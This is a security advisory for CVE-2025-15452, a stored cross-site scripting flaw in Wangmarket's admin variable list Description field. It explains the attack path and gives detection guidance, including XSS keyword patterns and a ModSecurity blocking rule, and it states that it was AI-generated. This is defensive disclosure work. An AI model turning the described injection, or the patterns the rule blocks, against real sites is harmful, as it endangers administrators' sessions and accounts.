CVE-2025-15452 Overview
A Cross-Site Scripting (XSS) vulnerability has been identified in xnx3 Wangmarket versions up to 4.9. This security flaw affects the variableList function within the /admin/system/variableList.do file of the Backend Variable Search component. The vulnerability allows remote attackers to execute arbitrary client-side scripts by manipulating the Description argument, potentially leading to session hijacking, credential theft, or other malicious actions against authenticated users.
Critical Impact
Remote attackers with high privileges can exploit improper input validation to inject malicious scripts that execute in the context of other users' browsers, potentially compromising administrator sessions and backend access.
Affected Products
- xnx3 Wangmarket versions up to 4.9
- Wangmarket Backend Variable Search component
- /admin/system/variableList.do endpoint
Discovery Timeline
- 2026-01-05 - CVE-2025-15452 published to NVD
- 2026-01-08 - Last updated in NVD database
Technical Details for CVE-2025-15452
Vulnerability Analysis
This vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation), commonly known as Cross-Site Scripting (XSS). The flaw exists in the Backend Variable Search functionality of the Wangmarket content management system, specifically within the variableList function that handles the Description parameter.
When users with administrative privileges submit data through the variable list interface, the application fails to properly sanitize or encode the Description field before rendering it in the response page. This allows an attacker to inject malicious JavaScript or HTML content that will be executed when other users view the affected page.
The vulnerability requires high privileges (administrative access) to exploit, and also requires user interaction from the victim. This limits the attack surface but still presents a significant risk in multi-administrator environments or scenarios where an attacker has compromised a low-privilege admin account.
Root Cause
The root cause of this vulnerability is insufficient input validation and output encoding in the Wangmarket backend. The variableList function in /admin/system/variableList.do directly processes user-supplied input from the Description argument without applying proper HTML entity encoding or script filtering before rendering the content back to users.
This failure to implement proper output encoding allows arbitrary HTML and JavaScript code to be injected and subsequently executed in the browser context of users who view the stored content.
Attack Vector
The attack is network-based and can be launched remotely against the administrative interface. An attacker with backend access would craft a malicious payload containing JavaScript code within the Description field of a variable list entry.
When this stored XSS payload is viewed by another administrator or user with access to the backend variable search functionality, the malicious script executes in their browser. This could enable the attacker to steal session cookies, perform actions on behalf of the victim, or redirect users to malicious sites.
The exploit has been made publicly available, increasing the risk of active exploitation. Technical details are documented in the VulDB advisory and additional security documentation is available in the Yuque security document.
Detection Methods for CVE-2025-15452
Indicators of Compromise
- Unusual or unexpected JavaScript code appearing in variable Description fields within the Wangmarket backend
- HTTP requests to /admin/system/variableList.do containing encoded script tags or event handlers in the Description parameter
- Abnormal session activity or unauthorized administrative actions following access to the variable list page
- Browser-based alerts or redirects occurring when viewing backend variable search results
Detection Strategies
- Implement Web Application Firewall (WAF) rules to detect and block XSS payloads in POST requests to /admin/system/variableList.do
- Monitor application logs for requests containing common XSS patterns such as <script>, javascript:, onerror=, or other event handler attributes in the Description parameter
- Deploy Content Security Policy (CSP) headers to detect and report inline script execution attempts
- Conduct regular security audits of stored content in the variable list database for suspicious entries
Monitoring Recommendations
- Enable detailed logging for all administrative actions within the Wangmarket backend, particularly for the variable search functionality
- Configure alerts for multiple failed or suspicious requests to the affected endpoint
- Implement browser-side monitoring solutions to detect unexpected script execution in administrative contexts
- Regularly review stored variable descriptions for signs of injection attempts
How to Mitigate CVE-2025-15452
Immediate Actions Required
- Restrict access to the Wangmarket administrative backend to trusted IP addresses only
- Review existing variable list entries for any suspicious or unexpected content in Description fields
- Implement additional authentication requirements for accessing the variable search functionality
- Consider temporarily disabling the variable list feature until a patch is available
Patch Information
The vendor (xnx3) was contacted early regarding this vulnerability disclosure but did not respond. As of the last update on 2026-01-08, no official patch has been released for this vulnerability.
Organizations using Wangmarket should monitor the official project channels for security updates and consider implementing compensating controls until a fix is available. For technical details and updates, refer to the VulDB entry.
Workarounds
- Apply input validation and output encoding at the application level by modifying the variableList function to sanitize the Description parameter
- Deploy a Web Application Firewall (WAF) with rules specifically targeting XSS patterns in the affected endpoint
- Implement Content Security Policy (CSP) headers with strict directives to prevent inline script execution
- Limit administrative access to essential personnel only and enforce multi-factor authentication for backend access
- Consider using a reverse proxy to filter and sanitize input before it reaches the application
# Example WAF rule configuration for blocking XSS in Description parameter
# ModSecurity rule for Apache/Nginx
SecRule ARGS:Description "@rx (?i)(<script|javascript:|on\w+\s*=)" \
"id:100001,\
phase:2,\
deny,\
status:403,\
msg:'Potential XSS in variableList Description parameter',\
logdata:'Matched Data: %{MATCHED_VAR}',\
severity:'WARNING'"
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
